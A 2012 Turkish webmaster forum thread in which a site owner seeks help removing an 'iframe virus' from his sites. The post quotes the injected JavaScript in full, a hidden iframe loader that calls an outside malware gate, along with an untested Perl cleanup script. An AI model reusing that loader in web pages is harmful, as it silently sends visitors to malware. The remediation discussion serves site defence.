Forum
Kariyer
Blog
Dizin
Nedir?
2
İnstagramda ve sosyal medya platfomlarında
Takipçilerini Yükseltmek
artık sadece 10 TL , Tıkla kayıt ol işlemlerine hemen başla !
WM Aracı'na üyelikler tekrar açıldı!
Ücretsiz Üye Olmak İçin Tıklayın!
Giriş Yap
Kayıt Ol
İlanlar
Konular
Önek - Sonek
MD5 - SHA1 Aracı
KDV Hesaplama
Çekiliş Aracı
Whois Sorgulama
Tüm Araçlar
IP Class Sorgulama
Siteleri a, b ve c ip class'larına göre ayırın.
Link Çıkartıcı
Sitenizdeki linkleri çıkartın.
Güçlü Şifre Oluşturma
Bu araç ile çok güçlü şifreler oluşturabilirsiniz.
TÜM ARAÇLARIMIZ
Tema Seçeneği
Site Sesleri
Bildirimler
Özel Mesaj Al
2
Bildirimleriniz
Tüm Bildirimleri Okundu Say
İnstagramda ve sosyal medya platfomlarında
Takipçilerini Yükseltmek
artık sadece 10 TL , Tıkla kayıt ol işlemlerine hemen başla !
WM Aracı'na üyelikler tekrar açıldı!
Ücretsiz Üye Olmak İçin Tıklayın!
Tüm Bildirimleriniz
Konu:
İframe Virüsü Tam olarak Temizleme
07.02.2012 18:37
#
byleo
WM Aracı
Kullanıcı
Üyelik
03.02.2012
Yaş/Cinsiyet
- / E
Meslek
Konum
Ad Soyad
** **
Mesajlar
5
Beğeniler
1 / 0
Ticaret
0, (%0)
Selam Arkadaşlar
yaklaşık 40 günden beridir sunucumdaki sitelerin hemen hepsi
virüsü ile tanışmış bulunmakta. Bu virüs ile ilgili olarak normal prosedürlerin hepsini yerine getirmeme rağmen, Sitemdeki Hit düşüşünün nedenlerini Araştırırken Google web master araçlarından önizleme yaptırdığımda getirme hataları arasında şu adrese denk geldim "http://bigdeal777.com/gate.php?f=977533&r". bununla ilgili kısa bir google araştırmasından sonra sadece .php .html dosyalarına değil .js dosyalarınada bulaştığını gördüm :S. olası bütün yazma izinlerini kaldırmış olmama ve ftp şifremi değiştirmeme rağmen halen daha sitemdeki dosyalara bulaşmış olması beni bir hayli ürküttü. bununla ilgili olarak bir başka platformda konu açmış olan bir arkadaştan alıntı yaparak olayı biraz daha açmak istiyorum. <br/>konuyu açan "Cemaliozan" arkadaşımızında aynı sıkıntı başında sanırım. Kendisinin Affına Sığınarak aynen konuyu buraya atıyorum.. <br/> <br/><div class="quote" data-postid=" <br/> <br/>Godaddy de 9 yıldır sorunsuz çalışan 8-10 domaini bir arada barındıran Deluxe Hostum var. Root tan başlamak üzere tüm klasör ve dosyalarım salt okumaya (444) ayarlı. Muhtemelen FTP ile yüklediğim iframe virüsü bulaşmış bir dosya zaman zaman başta JavaScript dosyaları olmak üzere domainlere ayrı ayrı girip html,php ve javascript dosyalarını teker teker açıp, dosya izinlerini 777'ye ayarlayarak en son satırına aşağıdaki gibi eklemeler yapıyor. <br/> <br/>PHP Kodu:[PHP" contenteditable="false"><p><a href="/forum/mesaj/ <br/> <br/>Godaddy de 9 yıldır sorunsuz çalışan 8-10 domaini bir arada barındıran Deluxe Hostum var. Root tan başlamak üzere tüm klasör ve dosyalarım salt okumaya (444) ayarlı. Muhtemelen FTP ile yüklediğim iframe virüsü bulaşmış bir dosya zaman zaman başta JavaScript dosyaları olmak üzere domainlere ayrı ayrı girip html,php ve javascript dosyalarını teker teker açıp, dosya izinlerini 777'ye ayarlayarak en son satırına aşağıdaki gibi eklemeler yapıyor. <br/> <br/>PHP Kodu:[PHP.html?git=1" target="_blank"><strong>Cemaliozan] Merhaba arkadaşlar </strong> adlı üyeden alıntı</a></p>/*qpi*/ <br/>function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false} <br/>var e=new Date();e.setTime(e.getTime()+(2592000000)); <br/>if(!g()&&window.navigator.cookieEnabled) <br/>{ <br/> document.cookie='1=1;expires='+e.toGMTString()+';path=/'; <br/> window.setTimeout(function(){ <br/> var JSinj=document.createElement('iframe'); <br/> //Bu adres satırı değişebiliyor <br/> JSinj.src='http://bigdeal777.com/gate.php?f=977533&r='+escape(document.referrer||''); <br/> JSinj.width='0'; <br/> JSinj.height='0'; <br/> JSinj.frameborder='0'; <br/> JSinj.marginheight='0'; <br/> JSinj.marginwidth='0'; <br/> JSinj.border='0'; <br/> try{ <br/> document.body.appendChild(JSinj); <br/> }catch(e){ <br/> document.documentElement.appendChild(JSinj); <br/> } <br/> }, 2000); <br/>} <br/>/*qpi*/ [/PHP] <br/>Tüm host dosyalarını lokale indirdim, kendi bilgisayarımda güncel bir kaç antivirüs ve malware ile taradım. Eklenmiş kodları temizleyip tekrar salt okunura ayarladım. Sağdan soldan alıpta kullandığım kod yoktur. Kodlarımın Bir kaç javascript kodu hariç tamamı bana aittir. Dolayısıyla içlerinde ne olduğunu iyi biliyorum. Veri tabanlarınıda olası bir script/code açığı bakımından kontrol ettim. Herhangi bir aksaklığa rastlamadım. <br/> <br/>Yaklaşık 15 gündür internette aramadığım yer kalmadı, sonunda ftpchk3.php isimli bir trojan dosyasının benzer saldırılar yaptığını öğrendim. Bu dosya benim klasörlerimin hiç birinde yok. Godaddy sunucuları bu tür dosyaların bulaşmasına karşı gerekli önlemleri almışlar. (Bir kaç sefer adı ftpchk3.php olan içi boş dosya oluşturup denedim anında silindi.) Fakat her nasılsa benim sorunumu çözemediler. <br/> <br/>Bu tip virüsün temizlenmesi ile ilgili olarak bir perl kodu buldum. Hem perl hem php bilgisi olan biri bu kodu php'ye çevirirse memnun olurum. Bu virüsle daha önce uğraşan arkadaşların konu hakkındaki yorum ve çözüm önerilerini bekliyorum. <br/> <br/>PERL Kodu : <br/>PHP Kodu:<code>#!/usr/bin/perl <br/># <a href="http://digitalpbk.blogspot.com/2009/10/ftpchk3-virus-php-pl-hacked-website.html" target="_blank" rel="ugc">http://digitalpbk.blogspot.com/2009/10/ftpchk3-virus-php-pl-hacked-website.html</a> <br/>use strict; <br/>`grep -Rn aWYoIWlzc2V0KCRiMHNyMSkpe2Z1bmN0aW9u * | cut -d ':' -f 1 > listofinfected`; <br/> <br/>open FP,"listofinfected"; <br/>my $file; <br/>while($file = <FP>){ <br/> print "Testing $file ... "; <br/> chomp($file); <br/> if(-e ($file)){ <br/> open VI,$file; <br/> my @filecon = <VI>; <br/> close VI; <br/> <br/> if($filecon[0] =~ m/aWYoIWlzc2V0KCRiMHNyMSkpe2Z1bmN0aW9u/){ <br/> <br/> $filecon[0] =~ s/(<\?.*?\?>)//g; <br/> <br/> rename($file,$file.".infected"); <br/> <br/> open VI,">$file"; <br/> print VI join('',@filecon); <br/> close VI; <br/> <br/> print $file." Fixed !!"; <br/> } <br/> } <br/> print "\n"; <br/>} <br/> <br/>close(FP); <br/> <br/>`grep -Rn ftpchk3.php * | cut -d ':' -f 1 > listofinfected2`; <br/> <br/>open FP,"listofinfected2"; <br/>my $file; <br/>while($file = <FP>){ <br/> print "Testing $file ... "; <br/> chomp($file); <br/> if(-e ($file)){ <br/> open VI,$file; <br/> my @filecon = <VI>; <br/> close VI; <br/> <br/> my $fc = join('',@filecon); <br/> $fc =~ s|document.write('<script(.*?)ftpchk3.php(.*)script>');||sig; <br/> $fc =~ s|<script[\s]+src="?http(.*?)ftpchk3.php(.*?)script>||sig; <br/> <br/> <br/> <br/> rename($file,$file.".infected"); <br/> <br/> open VI,">$file"; <br/> print VI $fc; <br/> close VI; <br/> <br/> print $file." Fixed !!"; <br/> } <br/> print "\n"; <br/>} <br/> <br/>close(FP); </code></div> <br/> <br/>Kullandığım Sistem WP olduğundan ayrıca; genelde bu virüsün sadece .html ve .php dosyalarına bulaştığını varsayan arkadaşlardan edindiğim "eksik bilgi ile .js dosyalarına baktığımda da kod yapısının farklı olabileceği hiç aklıma gelmediğinden bugün bütün siteleri tekrardan elden geçirmekteyim. Önemle Uyarıyorum Bu virüs sadece .html ve .php yada .asp dosyalarına bulaşmıyor. yazılabilir bütün dosyalara bulaşıyor. .txt de dahil. Virüsü temizleyen arkadaşlar bütün dosyalara baksınlar.. <br/> <br/>Yukarıdaki Perl in işe yarayıp yaramadığını <span style="text-decoration:underline;">test etmedim</span>. Perl in alındığı blogta <br/>Nasıl Çalıştığı şu şekilde belirtilmektedir. <br/> <br/>How to execute? <br/> <br/>Copy paste the code to a file called anti.pl <br/>From the terminal run <br/>perl anti.pl <br/> <br/>Burdan benim anladığım yukarıdaki perl kodlarını anti.pl olarak sunucu ana dizininde kaydetmemizi ve puty komut satırından cd /home/ anti.pl olarak çalıştırmamızı söylüyor. (<span style="color:Red;">yanlış anlamışta olabilirim bu yüzden denemedim</span>). Benim Merak ettiğim Asıl soru şudu; <br/> <br/>Arkadaşımızın Bahsettiği ftpchk3.php isimli dosya ile daha önce karşılaşan ve temizleyen oldumu? Zira kendi Pc imde 4 anti ve 2 malware tarayıcı ile taratığ zararlı görülen bütün dosyaları temizledim. FTP ve root şifrelerimin tamamını değiştirip Sadece manuel olarak giriş yapmaktayım. Fakat buna rağmen halen daha virüs sitelerimde aktif oluyor. <br/> <br/>Bu konuda daha önceden bilgisi olan arkadaşların tavsiyelerini bekliyorum. Herkese iyi çalışmalar... </div> <div class="bottomInfo"> <div class="left"> <a href="#" class="btn2 btn-sm like-unlike "><span class="icon"><i class="icon-like"></i></span></a> <div class="show-likers new-liker"> <div> </div> <p> </p> </div> </div> <div class="right post-action-buttons"> <a href="#" class="btn2 btn-sm share-post"> <span class="icon"><span class="post-action-text">Paylaş</span> <i class="icon-share-fill"></i></span> </a> </div> </div> </div> </div> </div> </div> <footer> <div class="container ads-container"> <div class="row row-ads wmads2"> <div class="col "><a target="_blank" title="reklam" href="https://wmaraci.com/reklam"><img alt="reklam" src="https://cdn.wmaraci.com/img/wmreklam.jpg"></a></div> <div class="col hideMobile "><a target="_blank" title="reklam" href="https://wmaraci.com/reklam"><img alt="reklam" src="https://cdn.wmaraci.com/img/wmreklam.jpg"></a></div> </div> </div> <div class="center"> <div class="container"> <div class="row"> <div class="left"> <img src="/assets/img/load.svg" data-src="/assets/img/logo.svg" width="176" height="36" alt="wmaraci"> <strong>Copyright © 2010 - 2024</strong> <p> WM Aracı, BTK onaylı bir yer sağlayıcı olarak içerikleri kontrol etme ya da araştırma yükümlülüğü yoktur. Hukuka aykırı olduğunu düşündüğünüz içerikleri lütfen bize bildiriniz. </p> <a href="/iletisim" class="btn btn-grey"><span class="icon"><i class="icon-exclamation"></i>Aykırı İçerik Bildir</span></a> <ul> <li><a href="https://facebook.com/wmaraci" target="_blank" rel="nofollow" class="icon-facebook"></a></li> <li><a href="https://twitter.com/wmaraci" target="_blank" rel="nofollow" class="icon-x"></a></li> <li><a href="https://t.me/wmaraci" target="_blank" rel="nofollow" class="icon-telegram"></a></li> <li><a href="https://www.youtube.com/wmaracicom" target="_blank" rel="nofollow" class="icon-youtube"></a></li> <li><a href="https://www.instagram.com/wmaraci/" target="_blank" rel="nofollow" class="icon-instagram"></a></li> </ul> </div> <div class="right"> <div class="row"> <div> <strong class="head"><i class="icon-support"></i>Araçlar</strong> <ul> <li><a href="/whois">Whois Sorgulama</a></li> <li><a href="#">SEO Analiz</a></li> <li><a href="#">Site Analiz</a></li> <li><a href="#">Sıra Bulucu</a></li> <li><a href="/araclar">Kod/Tasarım Araçları</a></li> <li><a href="/araclar">Site Araçları</a></li> </ul> </div> <div> <strong class="head"><i class="icon-layers"></i>WM Aracı Forum</strong> <ul> <li><a href="/yeni-ilanlar">İlanlar</a></li> <li><a href="/yeni-konular">Konular</a></li> <li><a href="/arama">Gelişmiş Arama</a></li> <li><a href="/sikayet">Şikayetim Var</a></li> <li><a href="/anketler">Anketler</a></li> </ul> </div> <div> <strong class="head"><i class="icon-more"></i>Diğer Sayfalar</strong> <ul> <li><a href="/hakkimizda">Hakkımızda</a></li> <li><a href="/premium">Premium Üyelikler</a></li> <li><a href="/gizlilik-politikasi">Gizlilik Politikası</a></li> <li><a href="/mesafeli-satis-sozlesmesi">Mesafeli Satış Sözleşmesi</a></li> <li><a href="/teslimat-ve-iade">Teslimat ve İade Politikası</a></li> <li><a href="/hukuka-aykirilik-bildirimi">Hukuka Aykırılık Bildirimi</a></li> </ul> </div> </div> </div> </div> </div> </div> <div class="bottom"> <div class="container"> <div class="row"> <ul> <li><a href="/hakkimizda">Hakkımızda</a></li> <li><a href="/reklam">Reklam & İş Birlikleri</a></li> <li><a href="/iletisim">Bize Ulaşın</a></li> </ul> <div> <span>WM Aracı, <b>Cesur.NET İnternet Teknolojileri</b>'nde güvenle barınmaktadır.</span> </div> </div> </div> </div> </footer> <div id="footerMenu"> <button style="z-index:1"><i class="icon-arrow-bottom"></i><i class="icon-arrow-top"></i></button> <ul> <li><a href="/"><i class="icon-home"></i>ANASAYFA</a></li> <li><a href="/forum"><i class="icon-layers"></i>FORUM</a></li> <li><a href="/giris"><i class="icon-account"></i>GİRİŞ YAP</a></li> <li><a href="/kayit"><i class="icon-plus-sign"></i>KAYIT OL</a></li> </ul> </div> </div> <div id="mobileMenu"> <div class="content"> <div class="main"> <a href="#" class="icon-times"></a> <div class="logined"> <div> </div> <ul> <li><a href="/giris"><i class="icon-account"></i><span>Giriş Yap</span></a></li> <li><a href="#" class="openSettings"><i class="icon-equalizer"></i><span>Site Ayarları</span><b class="icon-arrow-right"></b></a></li> </ul> </div> <ul class="menu"> <li><a href="/yeni-ilanlar"><i class="icon-shopping-basket"></i>İlanlar</a></li> <li><a href="/yeni-konular"><i class="icon-layers"></i>Konular</a></li> <li class="subs"> <a href="#"><i class="icon-support"></i>Araçlar<span class="icon-down-arrow"></span></a> <ul class="vehicle"> <li> <a href="/whois"> <i class="icon-folder-internet" style="color:#18C65D"></i> <strong>Whois Sorgulama</strong> Hızlı ve kolay bir şekilde whois sorgulama yapın. </a> </li> <li> <a href="/ip-class-sorgulama"> <i class="icon-abc-block" style="color:#0382FF"></i> <strong>IP Class Sorgulama</strong> Siteleri a, b ve c ip class'larına göre ayırın. </a> </li> <li> <a href="/cekilis-araci"> <i class="icon-number-list" style="color:#83CB6A"></i> <strong>Çekiliş Aracı</strong> Gelişmiş özelliklere sahip çekiliş aracı. </a> </li> </ul> </li> </ul> <ul class="sub"> <li><a href="/forum">Forum</a></li> <li><a href="/kariyer">Kariyer</a></li> <li><a href="/blog">Blog</a></li> <li><a href="/dizin">Dizin</a></li> <li><a href="/nedir">Nedir?</a></li> </ul> </div> <div class="settings"> <a href="#" class="icon-times"></a> <div class="top"> <a href="#" class="icon-arrow-left"></a> <strong>Site Ayarları</strong> </div> <ul> <li> <div> <i class="icon-setting"></i> <span>Tema Seçeneği</span> <div> <div class="switch switch-grey"> <input type="checkbox" id="switchMobileThema" > <label for="switchMobileThema"><i class="icon-sun"></i><i class="icon-moon"></i></label> </div> </div> </div> </li> <li> <div> <i class="icon-sound"></i> <span>Site Sesleri</span> <div> <div class="switch switch-grey"> <input type="checkbox" id="switchMobileMute" class="toggle-user-permission" data-permission="permissionSound" disabled> <label for="switchMobileMute"><i class="icon-mute"></i><i class="icon-volume"></i></label> </div> </div> </div> </li> <li> <div> <i class="icon-bell"></i> <span>Bildirimler</span> <div> <div class="switch"> <input type="checkbox" id="switchMobileNotice" class="toggle-user-permission" data-permission="permissionNotification" disabled checked> <label for="switchMobileNotice"></label> </div> </div> </div> </li> <li> <div> <i class="icon-bubble-speak"></i> <span>Özel Mesaj Al</span> <div> <div class="switch"> <input type="checkbox" id="switchMobilePrivateMessage" class="toggle-user-permission" data-permission="permissionPm" disabled> <label for="switchMobilePrivateMessage"></label> </div> </div> </div> </li> </ul> </div> </div> <div class="overlay"></div> </div> <div class="pop" id="popLogin"> <div class="content"> <div> <div> <div class="content login"> <div> <div class="head3"> <h2>Üye Girişi Yap</h2> <strong>Kullanıcı bilgileriniz ile üye girişi yapabilirsiniz.</strong> <i class="icon-account"></i> <a href="#" data-pop-close="#popLogin" class="icon-times2"></a> </div> <div class="form"> <div class="form-group icon phone"> <i class="icon-phone-call"></i> <span>Telefon numaranız</span> <input type="text" name="email" class="activate-autocomplete" style="padding-left: 75px"> </div> <div class="form-group icon"> <i class="icon-key"></i> <span>Şifreniz</span> <input type="password" name="password" class="activate-autocomplete"> <b class="icon-eye"></b> </div> <div class="checkbox"> <input type="checkbox" name="rememberme" id="chckHistory" value="1"> <label for="chckHistory"><i class="icon-check"></i>Sonraki girişlerimde beni hatırla.</label> </div> <button class="btn btn-md login-btn"><span class="icon reverse">Üye Girişi Yap <i class="icon-arrow-right"></i></span></button> <button class="btn btn-extra-light-grey btn-sm forgot-password"><span>Şifremi Unuttum!</span></button> </div> </div> </div> </div> </div> </div> <div class="overlay"></div> </div> <div id="fixMessages"></div> <script src="/assets/js/cash.min.js"></script> <script src="/assets/js/build.js"></script> <script src="/assets/js/wma.js?3"></script> <script src="/assets/js/custom.js"></script> <script> $('input:not(.activate-autocomplete), form:not(.activate-autocomplete)').attr('autocomplete','new-password'); $("#footerMenu button").on("click",function(e){ if($("body").hasClass("openFooterMenu")){ wma.setCookie('mobileFoterMenu', 'off'); }else{ wma.setCookie('mobileFoterMenu', 'on'); } }); $("#switchThema").on("change",function(){ var darkMode; if($("#switchThema").prop("checked")){ $("body").addClass("dark"); wma.setCookie('darkMode', 'dark'); darkMode = 1; }else{ $("body").removeClass("dark"); wma.setCookie('darkMode', ''); darkMode = 0; } if (wm.user.userid) { wma.post('/profile/setDarkMode', {darkMode: darkMode}, function() {}); } }); $("#switchMobileThema").on("change",function(){ var darkMode; if($("#switchMobileThema").prop("checked")){ $("body").addClass("dark"); wma.setCookie('darkMode', 'dark'); darkMode = 1; }else{ $("body").removeClass("dark"); wma.setCookie('darkMode', ''); darkMode = 0; } if (wm.user.userid) { wma.post('/profile/setDarkMode', {darkMode: darkMode}, function() {}); } }); $('#popLogin .forgot-password').on('click', function(e) { e.preventDefault(); location.href = '/sifremi-unuttum'; }); $('#popLogin .login-btn').on('click', function(e) { e.preventDefault(); var loginData = { email: $('#popLogin input[name="email"]').val(), password: $('#popLogin input[name="password"]').val(), rememberme: $('#popLogin input[name="rememberme"]').is(':checked') }; wma.post('/auth/login', loginData, function(data) { if (data.status == 'success') { if (data.sms) { $('#popLogin [data-pop-close="#popLogin"]').trigger('click'); wma.form({ title: { title: "Doğrulama Kodunu Girin", subTitle: "Giriş için telefonunuza gönderilen kodu girin.", icon: "icon-sms", }, fields: { code: { label: 'Doğrulama Kodu', value: '', type: 'text' } }, callback: function(data) { var newData = loginData; newData.code = data.code; wma.post('/auth/login', newData, function(d) { if (d.status == 'success') { location.href = location.href.replace('#', ''); } else { wma.toast(d.title); } }); } }); wma.activeModal.find('.content').css('width', '440px'); wma.activeModal.find('button').text('Üye Girişi Yap'); wma.activeModal.find('form').on('submit', function(e) { e.preventDefault(); wma.activeModal.find('.mcuLoadingButton').trigger('click'); }); } else { localStorage.removeItem('fixedConversations'); if (data.redirect == '/yeniden-degerlendir') { location.href = data.redirect; } else { location.href = location.href.replace('#', ''); } } } else { wma.toast(data); } }); return; }); $('#popLogin input').on('keyup', function(e) { if (e.key == 'Enter') { $('#popLogin .login-btn').trigger('click'); } }); var notificationCount = localStorage.getItem('notificationCount') || 0; var conversationCount = localStorage.getItem('conversationCount') || 0; $('body').on('click', '.vn', function() { wma.post('/forum/setVisitorNotificationAsRead', {id: $(this).data('id')}, function(d) {}); }); $('body').on('click', '.start-popup-conversation', function(e) { e.preventDefault(); return wma.toast('Üyeye özel mesaj göndermek için giriş yapmalısınız.'); }); var visitorNotificationTriggered = localStorage.getItem('visitorNotificationTriggered') || 0; if (!visitorNotificationTriggered) { setTimeout(function() { document.querySelector('.visitor-notifications').style.display = 'block'; }, 3000); $(document).on('mouseup', function(e) { var container = $(".notice"); if (!container.is(e.target) && container.has(e.target).length === 0) { document.querySelector('.visitor-notifications').style.display = ''; } }); localStorage.setItem('visitorNotificationTriggered', 1); } </script> <script> var thread = { threadId: '23234', categoryId: '38', title: 'İframe Virüsü Tam olarak Temizleme', slug: 'iframe-virusu-tam-olarak-temizleme', categorySslug: 'wordpress', pollId: '', lastReplyAt: '2014-03-17 20:34:55', canReplyThread: false, }; var jsVersion = 5; $('.btn-share-thread').on('click', function(e) { e.preventDefault(); $('.post-card .share-post').trigger('click'); }); </script> <script src="/assets/js/thread/thread.min.js?8"></script> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-8647194-20"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-8647194-20'); </script> </body> </html>
